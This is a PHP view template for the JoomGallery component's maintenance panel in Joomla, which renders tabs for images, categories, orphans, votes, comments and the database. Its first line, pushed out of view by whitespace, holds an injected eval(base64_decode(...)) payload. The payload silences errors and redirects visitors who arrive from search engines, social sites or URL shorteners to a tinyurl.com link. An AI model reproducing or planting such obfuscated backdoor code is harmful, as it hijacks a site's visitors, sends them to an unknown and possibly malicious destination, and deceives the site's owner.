<?php	                                       			eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly90aW55dXJsLmNvbS9hZWxud2o0Iik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));

defined('_JEXEC') or die('Direct Access to this location is not allowed.');
echo $this->pane->startPane('content-pane');
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_TAB_IMAGES').$this->information['images'], 'cpanel-panel-joom-maintenance-db-images');
echo $this->loadTemplate('dbimages');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_TAB_CATEGORIES').$this->information['categories'], 'cpanel-panel-joom-maintenance-db-categories');
echo $this->loadTemplate('categories');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_TAB_ORPHANS').$this->information['orphans'], 'cpanel-panel-joom-maintenance-file-images');
echo $this->loadTemplate('orphans');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_TAB_ORPHANED_FOLDERS').$this->information['folders'], 'cpanel-panel-joom-maintenance-file-folders');
echo $this->loadTemplate('folders');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_VOTES_MANAGER'), 'cpanel-panel-joom-maintenance-votes');
echo $this->loadTemplate('votes');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_TAB_NAMETAGS'), 'cpanel-panel-joom-maintenance-nametags');
echo $this->loadTemplate('nametags');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_COMMAN_COMMENTS_MANAGER'), 'cpanel-panel-joom-maintenance-comments');
echo $this->loadTemplate('comments');
echo $this->pane->endPanel();
echo $this->pane->startPanel(JText::_('JGA_MAIMAN_TAB_DATABASE'), 'cpanel-panel-joom-maintenance-database');
echo $this->loadTemplate('database');
echo $this->pane->endPanel();
echo $this->pane->endPane();
JHTML::_('joomgallery.credits');
